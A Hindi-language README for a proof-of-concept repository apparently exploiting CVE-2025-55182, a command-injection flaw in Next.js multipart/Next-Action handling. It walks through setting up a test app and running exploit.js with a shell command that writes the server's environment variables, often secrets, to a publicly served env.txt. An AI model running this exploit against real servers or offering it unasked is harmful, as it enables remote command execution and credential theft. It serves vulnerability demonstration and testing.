
CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Next.js के multipart/Next-Action हैंडलिंग को लक्षित करता है, जिसमें स्थानीय कमांड इंजेक्शन प्रदर्शन स्क्रिप्ट शामिल है।
एक छोटा भंडार जिसमें शामिल है:
test-app/: एक Next.js 16 (React 19) परीक्षण अनुप्रयोग जो App Router का उपयोग करता है।exploit.js: एक स्थानीय प्रमाण-अवधारणा स्क्रिप्ट जिसका उपयोग multipart/Next-Action हैंडलिंग के आसपास सर्वर व्यवहार को प्रदर्शित और परीक्षण करने के लिए किया जाता है। केवल स्थानीय परीक्षण के लिए अभिप्रेत है।rsc-test-app/
├─ README.md # आप यहाँ हैं
├─ exploit.js # PoC स्क्रिप्ट (केवल स्थानीय)
└─ test-app/ # Next.js अनुप्रयोग
├─ app/ # App Router पेज
├─ public/ # स्थैतिक संपत्तियाँ (और env.txt जब उत्पन्न हो)
├─ package.json # Next 16 / React 19
└─ README.md # डिफ़ॉल्ट Next.js टेम्पलेट README
cd test-app
npm install
npm run dev
# ऐप http://localhost:3000 पर उपलब्ध होगा
npm run build
npm start
यह स्क्रिप्ट सर्वर व्यवहार का परीक्षण करने के लिए Next-Action हेडर के साथ एक multipart अनुरोध तैयार करती है। डिफ़ॉल्ट रूप से, यह सर्वर प्रक्रिया पर एक कमांड निष्पादित करने का प्रयास करती है जो पर्यावरण को public/env.txt में लिखता है (स्थानीय/डेव वातावरण में प्रदर्शन के लिए)।
महत्वपूर्ण नोट:
public/ test-app/public/ के अंतर्गत हल हो।एक अलग टर्मिनल में, सुनिश्चित करें कि Next.js ऐप http://localhost:3000 पर चल रहा है:
cd test-app
npm run dev
भंडार के मूल से, स्क्रिप्ट चलाएँ:
node exploit.js http://localhost:3000 "sh -lc 'printenv > public/env.txt'"
पैरामीटर:
http://localhost:3000 है।sh -lc 'printenv > public/env.txt' है।चलाने के बाद, उत्पन्न फ़ाइल की जाँच करें:
http://localhost:3000/env.txt
पर पहुँच कर।
और इस प्रकार आपके पास सर्वर के env चर हैं।